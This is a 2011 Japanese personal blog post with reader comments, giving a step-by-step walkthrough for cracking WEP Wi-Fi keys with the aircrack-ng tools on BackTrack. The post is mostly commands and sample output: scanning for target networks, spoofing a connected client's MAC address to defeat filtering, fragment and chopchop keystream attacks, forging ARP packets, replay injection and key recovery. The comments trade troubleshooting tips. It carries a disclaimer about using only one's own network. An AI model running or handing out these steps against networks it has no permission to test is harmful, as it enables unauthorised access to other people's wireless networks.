Carpe Diem

  Top > スポンサー広告> セキュリティ > WEPクラック  

スポンサーサイト

-- - --/-- [--] - --:--

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

WEPクラック

2011 - 07/02 [Sat] - 03:26

※自分の管理下の環境で行ってください。そうでない場合は法により罰せられる可能性があります。

今回はWEPクラックのメモ。
せっかくBackTrackをいれたので、いくつかツールを試してみました。
ネットのやり方にはあまり載ってない注意点を主に書いて行こうかなぁと。

あと基本BackTrackでやってるので、素のUbuntuには以下のコマンドはありません。

WEPクラックの主な流れは以下です。

1、自分の無線をモニタモードにする
2、流れてる無線の電波を見る(ターゲット決め)
3、ターゲットからパケットを集める(一番重要?)
4、集めたパケットを元にWEPキーを解析する


です。MacフィルタリングやSSIDをステルス化されてると作業が少し手間になります。

では以下詳細

◆モニタモード
まず自分の使ってる無線(インターフェース)を確認します。
~# iwconfig
wlan0     IEEE 802.11abgn  ESSID:"<hidden>" 
             Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated


で、wlan0と名前が分かったら無線のモード変えます

~# airmon-ng start wlan0

こうすると最後の方に

wlan0        Intel 5300AGN    iwlagn - [phy0]
                (monitor mode enabled on mon0)


と出ます。このmon0がモニターモードのインターフェースです。
今後これをモニタリングにはこのmon0を使用します。

◆無線の電波を見る
まずは無差別で見ます。

~# airodump-ng mon0
すると画面が切り替わって

BSSID    PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH  ESSID
                                                                              
 <MacAd>  -87        3          0     0   4   54e  WEP  WEP            CG-Guest
 <MacAd>  -88        3          0     0   4   54e  WPA2 CCMP   PSK   <length: 0>
 <MacAd>  -90        3          0     0   9   54e  WEP  WEP            myLGN
                                                                              
 BSSID                STATION            PWR   Rate     Lost  Packets  Probes     
  <MacAddress>   <MacAddress>   -21   54e-54e     0        5      
      

という感じに近くの無線の一覧がでます。下半分は無線につないでる一覧です。
ここでターゲット決めをするわけです。試すときは自分のルータでやってくださいね。
※ESSIDが<length:12>などのようになっていたら正規のユーザが接続してくるまで待つ必要がある。

ターゲットを決めたら今度はその無線のみをモニタリングします。今回は仮の話で一番上のものとします。
かつログをとります。-wオプションでログをとれます。保存名称は何でもいいです。今回はlog
--channelオプションは無線のチャンネル。上の一覧を参照すればいいです。これを指定しないと次のパケット収集で困るかも?
--bssidオプションは対象のMacアドレスです。

~# airodump-ng --channel 4 --bssid <MacAd> -w log mon0

すると今度はその無線しか見えなくなります。次に移ります。

◆ターゲットからパケットを集める
一度ここでMacフィルタがかかっているかのチェック。

~# aireplay-ng -1 0 -a <MacAd> -h 自機MACアドレス -e ESSID mon0

これでAssociation successfulなら大丈夫。DeAssociationならフィルタがかかっているのでMacアドレスを変更してください(一覧の下半分のつないでいる人を元に変更します)。(それでもだめな場合は、オープンシステム認証でなく共有鍵認証を用いています)

さて確認が終わったら次へ。パケット集めです。

これは2通りあります。
・周りが使っているのを利用する。(大勢の人が使ってる場合)
・周りに接続している人がいないため、自分で無理やりパケットを発生させる。パケットインジェクション


ちなみに前者はまだ違反ではありませんが、後者は確実に違反になります。ただ手早くパケットを収集できるのは後者です。
そのままログが集まるのを待てばいいです。見るのは上の項目の中の「#Data」です。これが5000以上たまったら次の行動に移れます。
まぁ一応

~# aireplay-ng -3 -b <MacAd> -h 自機MACアドレス mon0

をしてもいいのかな?でもこれをやったら違反かも。やらなくても利用者が多ければデータは集まります。

もし接続者が少なくて、#Dataが全然集まらない場合は自分で発生させる方法があります。後者です。やり方は2つあって

・fragment攻撃
~# aireplay-ng -5 -b <MacAd> -h 自機MACアドレス mon0

・chopchop攻撃
~# aireplay-ng -4 -b <MacAd> -h 自機MACアドレス mon0

です。これらどちらかを使ってキーストリームを「.xorファイル」に保存し、xorファイルからarpリクエストパケットを生成します。
このarpリクエストパケットを使うと#Dataが一気に増えます。
試した所感としては、chopchop攻撃はほぼ確実にいけます。ただ場合によっては少し時間がかかる。fragment攻撃は成功率はまちまち。でもうまく行けばすぐ出来ます。
どちらもうまく行かない場合はDeAssociationの可能性があるので(associationは時間がたつと自動で解除されるので、定期的にassociationする必要がある)、次のコマンドを動かした状態でやってみるとうまく行きます。

~# aireplay-ng -1 30 -a <MacAd> -h 自機MACアドレス -e ESSID mon0

さて戻りますが、xorファイルを保存できたら

~# packetforge-ng -0 -a BSSID -h 自機MACアドレス -k 255.255.255.255 -l 255.255.255.255 -y ???.xor -w 任意のファイル名(今回はpacとします)

としてarpリクエストパケットを生成。
-kは宛先IPアドレス。上のように適当でOK。-lは送信元IPアドレス。同じく適当でOK。
-yは作成するためのキーストリーム。さっきの~.xorファイル。

ここまできたらもうほとんど成功みたいなものです。ではパケットを増やします。

~# aireplay-ng -2 -r pac mon0

これを実行すると#Dataが急激に増えます。モニタで増えるのを確認できたら次に移ります。


◆パケット集めてWEPキー解析

ログファイルは~.capと保存されているので

~# aircrack-ng ~.cap


とすれば解析は始まります。解析が終了する間では、平行してログもとりつづけてください。
だいたい4~8万ほど#Dataは必要です。これくらい集まればほぼ確実に解析できます。

データが集まって解析が完了するとWEPキーが表示されます。お疲れ様でした。
あ、終わったらモニターモードを解除しておきましょう。

~# airmon-ng stop mon0

以上です。
もちろんその他色々やり方、注意事項があるので自分でググりながら最適なやり方を見つけるといいと思います。

自分もwepのテストをしています。

aireplay-ng -3 でARP攻撃をしても全てLOSTしてしまいます。もしよろしければご教授ください。

Re: タイトルなし

返信が遅れ申し訳ありません。

昔のことでやや記憶が曖昧なのですが、私の環境ではchopchop攻撃が一番確実でした。
chopchop攻撃 > arp攻撃(接続数が多い場合) > fragment攻撃 > arp攻撃(接続数が少ない)
という結果で成功しました。もしchakoさんの試している環境では接続数が少ないのであれば、他の2つの手法を試されることをオススメします。

この時のテストは以下のサイトを参考にしているので、よろしければご一読ください。

http://www.ebisu-it.com/bt-tips/wlan/

大変わかり易い説明ありがとうございます。
書いてある通りに進めてAssociation successfulまで成功して、自分のルーターはSSIDステルスも パケットフィルタリングもかけていないしAUTHの項目もOPNとなっているのですが、この後のfragment攻撃
~# aireplay-ng -5 -b <MacAd> -h 自機MACアドレス mon0
chopchop攻撃
~# aireplay-ng -4 -b <MacAd> -h 自機MACアドレス mon0
をしても、read #### packets となって何時間待っても、なんど時間をずらしてトライしてみても一向に進みません。
gerixで運良く成功したとしても、一向に#DATAが溜まらず困っております。何か設定が間違っているのでしょうか?よろしくお願いします。

コメントの投稿





管理者にだけ表示を許可する

 | ホーム | 

プロフィール

Cicatrice

Author:Cicatrice
備忘録

検索フォーム

カテゴリ

最新記事

上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。